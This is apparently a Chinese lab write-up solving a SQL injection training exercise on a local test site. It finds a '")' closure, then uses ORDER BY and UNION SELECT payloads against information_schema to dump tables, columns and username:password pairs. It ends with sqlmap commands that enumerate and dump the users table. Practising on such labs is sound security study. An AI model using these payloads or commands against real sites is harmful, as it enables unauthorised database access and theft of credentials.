hacker
观察页面
id=1
有正常回显页面
判断注入点
注入id=1’,成功得到了回显,说明此次注入点不在单引号的闭合上
尝试前面的括号
同样可以得到回显,尝试双引号
出现了报错,可以看到的这里报错的地方还有一个括号,说明这不是单纯的用双引号进行闭合,还有用到括号
测试
?id=1" )and 1=1 --+
得到,该注入点为:)🦃
判断字段数
?id=1") order by 3--+
输入4时发生了报错,说明字段数为3
判断回显位
id=1") and 0 union select 1,2,3 --+
回显位为2、3位
爆数据库名
id=1") and 0 union select 1,2,3 --+
爆数据库中的数据表名
?id=1") and 0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
爆数据表中的字段名
![?id=1") and 0 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+](https://img-blog.csdnimg.cn/f13ce7f41dec4587bedae62ce8de18be.png)
爆数据库的所有内容
?id=1") and 0 union select 1,group_concat(concat_ws(':',id,username,password)),3 from users --+
成功拿到数据库数据
sqlmap
sqlmap -u "http://0.0.0.0:8088/Less-2//?id=1" -batch
返回漏洞的一些信息,不过没啥用
爆数据库名
sqlmap -u "http://0.0.0.0:8088/Less-2//?id=1" -batch -dbs
爆数据库中的数据表
sqlmap -u "http://0.0.0.0:8088/Less-2//?id=1" -batch -D security --tables
爆数据表的字段信息
sqlmap -u "http://0.0.0.0:8088/Less-2//?id=1" -batch -T users --columns
爆数据表的信息
sqlmap -u "http://0.0.0.0:8088/Less-2//?id=1" -batch -D security -T users -C username,password -dump